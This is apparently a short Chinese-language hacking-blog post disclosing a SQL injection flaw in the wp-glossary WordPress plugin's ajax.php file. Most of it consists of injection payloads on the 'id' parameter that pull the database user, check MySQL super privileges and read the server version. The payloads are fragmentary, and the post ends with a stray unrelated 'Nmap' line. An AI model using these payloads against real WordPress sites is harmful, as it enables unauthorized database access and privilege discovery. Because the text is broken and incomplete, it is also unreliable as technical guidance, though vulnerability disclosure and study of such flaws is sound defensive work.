当前位置: iick's blog > 网站漏洞 > WordPress插件WP WordPress SQL注射缺陷

WordPress插件WP WordPress SQL注射缺陷

作者:hack1990 时间:11-10-31 阅读数:571人阅读

这个插件含sql注射缺陷

文件:wp-content/plugins/wp-glossary/ajax.php

测试: id=-1; or 1=if

 *示例*

http://www.hack1990.com /wp-content/plugins/wp-glossary/ajax.php

 [GET][id=-1][CURRENT_USER()

http://www.hack1990.com /wp-content/plugins/wp-glossary/ajax.php

 [GET][id=-1][SELECT

(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT

0,1)='Y') THEN 1 ELSE 0 END)

http://www.hack1990.com /wp-content/plugins/wp-glossary/ajax.php [GET][id=-1][MID((VERSION()),1,6)

 

# Nmap Security Scanner 7.0

上一篇:智思留言本(zsBook v3.2.1)漏洞

下一篇:Ybcms通杀0day

相关文章

发表评论